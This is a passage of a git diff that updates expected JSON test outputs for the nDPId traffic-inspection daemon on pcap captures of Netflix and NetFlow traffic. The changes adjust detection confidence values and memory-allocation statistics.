+00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1307,"flow_first_seen":1484319064590,"flow_last_seen":1484319117695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1155976,"flow_avg_l4_payload_len":884,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":178,"flow_first_seen":1484319064593,"flow_last_seen":1484319070693,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":145506,"flow_avg_l4_payload_len":817,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":788,"flow_first_seen":1484319070636,"flow_last_seen":1484319117609,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":707039,"flow_avg_l4_payload_len":897,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1872,"flow_first_seen":1484319091296,"flow_last_seen":1484319117694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1734535,"flow_avg_l4_payload_len":926,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1484319032888,"flow_last_seen":1484319063911,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6835,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1484319033631,"flow_last_seen":1484319064012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10476,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1484319033943,"flow_last_seen":1484319064790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10490,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1484319064711,"flow_last_seen":1484319096924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24950,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 
00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","packets-captured":6999,"packets-processed":6999,"total-skipped-flows":0,"total-l4-payload-len":5686857,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":60,"total-detection-updates":52,"total-updates":0,"current-active-flows":0,"total-active-flows":61,"total-idle-flows":61,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":408,"global_ts_msec":1484319120726} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6999/6999 @@ -414,9 +414,9 @@ ~~ total active/idle flows...: 61/61 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6238433 bytes -~~ total memory freed........: 6238433 bytes -~~ total allocations/frees...: 125592/125592 +~~ total memory allocated....: 6372067 bytes +~~ total memory freed........: 6372067 bytes +~~ total allocations/frees...: 128354/128354 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 1482 chars diff --git a/test/results/netflow-fritz.pcap.out b/test/results/netflow-fritz.pcap.out index 61048b3d6..bccac0085 100644 --- a/test/results/netflow-fritz.pcap.out +++ b/test/results/netflow-fritz.pcap.out 
@@ -2,8 +2,8 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1498072707863} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1498072707863,"flow_last_seen":1498072707863,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1498072707863,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.1.1","src_port":23384,"dst_port":2055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1498072707863,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1498072707863,"pkt":"AAwRERERAAwRIiIiCABFKADQAABAAD8R1PvAqAABwKgBAVtYCAcAvAAAAAoAtFlKxZ0CWWXEAAQBAAACAHABzQAWAAEABIDPAAQAAGjygMz\/\/wAAaPKAzf\/\/AABo8gAHAAIACwACAAYAAgCxAAEAsAABALQAAgC1AAIAAgAEAM0AAgC5AAQAuAAEAAgABAAMAAQANgAEAFgAAgAEAAEAwAABgAH\/\/wAAaPIAAwA0AdIABwABAI8ABAApAAgAKgAIACgACAEwAAIBMQAEATIABAHTAAIAAQCOAAQAUv\/\/"} 
-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1498072707863,"flow_last_seen":1498072707863,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1498072707863,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.1.1","src_port":23384,"dst_port":2055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1498072707863,"flow_last_seen":1498072707863,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1498072707863,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.1.1","src_port":23384,"dst_port":2055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1498072707863,"flow_last_seen":1498072707863,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1498072707863,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.1.1","src_port":23384,"dst_port":2055,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1498072707863,"flow_last_seen":1498072707863,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1498072707863,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.1.1","src_port":23384,"dst_port":2055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":180,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1498072707863} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 693 chars 
diff --git a/test/results/netflowv9.pcap.out b/test/results/netflowv9.pcap.out index 3262dc8cd..722001c3d 100644 --- a/test/results/netflowv9.pcap.out +++ b/test/results/netflowv9.pcap.out 
@@ -2,10 +2,10 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"netflowv9.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1568213026961} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568213026961,"flow_last_seen":1568213026961,"flow_idle_time":200000,"flow_min_l4_payload_len":1376,"flow_max_l4_payload_len":1376,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":1376,"midstream":0,"thread_ts_msec":1568213026961,"l3_proto":"ip4","src_ip":"192.168.2.134","dst_ip":"192.168.2.222","src_port":48629,"dst_port":2057,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02297{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1568213026961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1418,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1418,"pkt_l4_len":1384,"thread_ts_msec":1568213026961,"pkt":"ACWQ1Mz5rB9rrWosCABFAAV8LBZAAEARgqbAqAKGwKgC3r31CAkFaHVWAAkAECROCO5dZ6gMFm+miAAAAAEBAwQkAAoEJE1qKCRNaigAAAAAAAAAKAAAAAAAAAABBo0ou7J9QF7TxAskWgIAkwAAlYsAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJEzp1CRNjMsAAAAAAAUbtAAAAAAAAASjBhdDjcSK9gL7ko0BuxoAkwAAMhAAAFHMhHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJEzp3CRNjKAAAAAAAB2wnwAAAAAAAAZqBor2AvsXQ43EAbuSjRoAkwAAUcwAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1ybSRNcm0AAAAAAAAAKAAAAAAAAAABBoOfghRcdiVS2B5evAIAkwAAixYAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1rLyRNay8AAAAAAAAAKAAAAAAAAAABBor09llcdiVKtb1pkQIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2QhyRNkIcAAAAAAAAAKAAAAAAAAAABBor0qxxcdiVS2B5S8QIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2JWyRNiVsAAAAAAAAAKAAAAAAAAAABBoOfWVu53tNywXcEGgIAkwADMXgAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1qjSRNao0AAAAAAAAALAAAAAAAAAABBor2xOMr4aaiqY0AFgIAkwAAseAAADIQ2GfZGI\/ahHisFZ1CAAAAAAAgAAAAAAAAAAAAAAAAAAoEJE2OYCRNjmAAAAAAAAAAKAAAAAAAAAABBo1UlODIXai05wABvQIAkwAAS+UAADIQ2GfZGI\/ahHisFZ1CAAAAAAAgAAAAAAAAAAAAAAAAAAoEJE11kyRNdisAAAAAAAACRwAAAAAAAAAKBoG7\/klQ1h8GKsoBuxsAkwAAFSIAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE11kyRNdisAAAAAAAAWPwAAAAAAAAAIBlDWHwaBu\/5JAbsqyh4AkwAAMhAAABUihHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2HTSRNh00AAAAAAAAAKAAAAAAAAAABBor1FpC5r10bvgPWnAIAkwAAiv4AADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2Q4yRNkOMAAAAAAAAAKAAAAAAAAAABBoOfV4ZcdiVS2B5ZXgIAkwAAixYAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEAQIAVAAKBCRNhcskTYXLAAAAAAAAAHoAAAAAAAAAARHN+8cOjVQJ2YZdADUAkwAAMhAAAEB9hHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAA
AAAAAAAAAAQcA1AAKBiRNJ\/YkTYzBAAAAAAAAELEAAAAAAAAADwYgARa4LRoyANRG8rtzEZ1EIAFMoAAAAQMAAAAAgbv\/\/PfhAbvbAGwAACKxAAAyENhn2RiP2oR4rBWdQgAAAAAAAAAAAAAAAAAAAAAAAAoGJE0n9iRNjMEAAAAAAAAIZQAAAAAAAAAMBiABTKAAAAEDAAAAAIG7\/\/wgARa4LRoyANRG8rtzEZ1EAbv34RsAbAAAMhAAACKxhHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAA="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568213026961,"flow_last_seen":1568213026961,"flow_idle_time":200000,"flow_min_l4_payload_len":1376,"flow_max_l4_payload_len":1376,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":1376,"midstream":0,"thread_ts_msec":1568213026961,"l3_proto":"ip4","src_ip":"192.168.2.134","dst_ip":"192.168.2.222","src_port":48629,"dst_port":2057,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568213026961,"flow_last_seen":1568213026961,"flow_idle_time":200000,"flow_min_l4_payload_len":1376,"flow_max_l4_payload_len":1376,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":1376,"midstream":0,"thread_ts_msec":1568213026961,"l3_proto":"ip4","src_ip":"192.168.2.134","dst_ip":"192.168.2.222","src_port":48629,"dst_port":2057,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} 
02225{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1568213026961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1366,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1366,"pkt_l4_len":1332,"thread_ts_msec":1568213026961,"pkt":"ACWQ1Mz5rB9rrWosCABFAAVILBdAAEARgtnAqAKGwKgC3r31CAkFNLI1AAkAECROCO5dZ6gMFm+miQAAAAEBAwTEAAoEJE2HcCRNh3AAAAAAAAAAKAAAAAAAAAABBoOf7vm5sBu2oskXJAIAkwADHowAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2RayRNkWsAAAAAAAAAKAAAAAAAAAABBo0oBklcdiVS2B5jWQIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE10SSRNdEkAAAAAAAAAKAAAAAAAAAABBor2SWJcdiVKtb25AgIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE10KiRNdCoAAAAAAAAAKAAAAAAAAAABBoOfXsy5sBu2oskPGwIAkwADHowAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2NbCRNjWwAAAAAAAAAKAAAAAAAAAABBor1CjVZ+KxV434I\/gIAkwADFrkAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2HTiRNh2kAAAAAAAAArQAAAAAAAAACBhH8TA+K9gIpwNYUZxgAkwAAMhAAAALKhHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2HWyRNh1sAAAAAAAAAnQAAAAAAAAACBor2AikR\/EwPFGfA1hgAkwAAAsoAADIQ2GfZGI\/ahHisFZ1CAAAAAAACAAAAAAAAAAAAAAAAAAoEJE1ycCRNcnAAAAAAAAAAKAAAAAAAAAABBor0oRm5sBu2oskF8wIAkwADHowAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1qhiRNaoYAAAAAAAAAKAAAAAAAAAABBo1Umhq5r10JuVyC6gIAkwAAiv4AADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2KayRNin8AAAAAAAAAcwAAAAAAAAACBlCeJjiK9gKwnKIUZxgAkwAAMhAAAIUmhHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2KeiRNinoAAAAAAAAASwAAAAAAAAABBor2ArBQniY4FGecohgAkwAAhSYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1v8SRNb\/EAAAAAAAAAKAAAAAAAAAABBor0mjxcdiVS2B5xQQIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2M1CRNjNQAAAAAAAAAKAAAAAAAAAABBo0otfJcdiVS2B5oFAIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1yviRNcr4AAAAAAAAAKAAAAAAAAAABBor0xzO5sBu2oskgMwIAkwADHowAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAA
AAAAoEJE1+PiRNfj4AAAAAAAAAKAAAAAAAAAABBor2SCBcdiVS2B5xvwIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAECAFQACgQkTYXUJE2F1AAAAAAAAAFBAAAAAAAAAAERjVQJ2c37xw4ANYZdAJMAAEB9AAAyENhn2RiP2oR4rBWdQgAAAAAAAAAAAAAAAAAAAAAAAA=="} 02298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1568213026961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1418,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1418,"pkt_l4_len":1384,"thread_ts_msec":1568213026961,"pkt":"ACWQ1Mz5rB9rrWosCABFAAV8LBhAAEARgqTAqAKGwKgC3r31CAkFaPcdAAkAECROCO5dZ6gMFm+migAAAAEBAwQkAAoEJE18UiRNfFIAAAAAAAAAKAAAAAAAAAABBor1GIyKxVabf\/8hYQIAkwAANu0AADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE188iRNfPIAAAAAAAAALAAAAAAAAAABBor1b6tTbs2s6Q\/qYQIAkwAAFQgAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE0b5CRNjsgAAAAAAAAD+QAAAAAAAAAKBtg6zy6Bu8nv4FQBux4AkwAAMhAAADtBhHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE0b7CRNjscAAAAAAAAH0wAAAAAAAAAIBoG7ye\/YOs8uAbvgVBoAkwAAO0EAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE13qiRNd6oAAAAAAAAAKAAAAAAAAAABBoG7U8O55eBgf\/8hYQIAkwAAodwAADIQ2GfZGI\/ahHisFZ1CAAAAAAAgAAAAAAAAAAAAAAAAAAoEJE2RLCRNkSwAAAAAAAAAKAAAAAAAAAABBoOfCHdcdiVS2B5lPQIAkwAAixYAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2C\/iRNhM0AAAAAAAAG0wAAAAAAAAAIBiOxkHGNVP4E02gBuxoAkwAAMhAAAEB9hHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2DFCRNhM0AAAAAAAATxgAAAAAAAAAJBo1U\/gQjsZBxAbvTaBoAkwAAQH0AADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE11DSRNdQ0AAAAAAAAALAAAAAAAAAABBor2Qvpdrl9qcVMffAIAkwADFrkAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2BfSRNgX0AAAAAAAAAKAAAAAAAAAABBo1UDOe5B+tq\/5UAUAIAkwAAISwAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1+qyRNfqsAAAAAAAAALAAAAAAAAAABBor1Lmtlbfp7vHIBvQIAkwAAXaEAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2AYyRNgGMAAAAAAAAAKAAAAAAAAAABBo1UHwVcdiVS2B5nAgIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAA
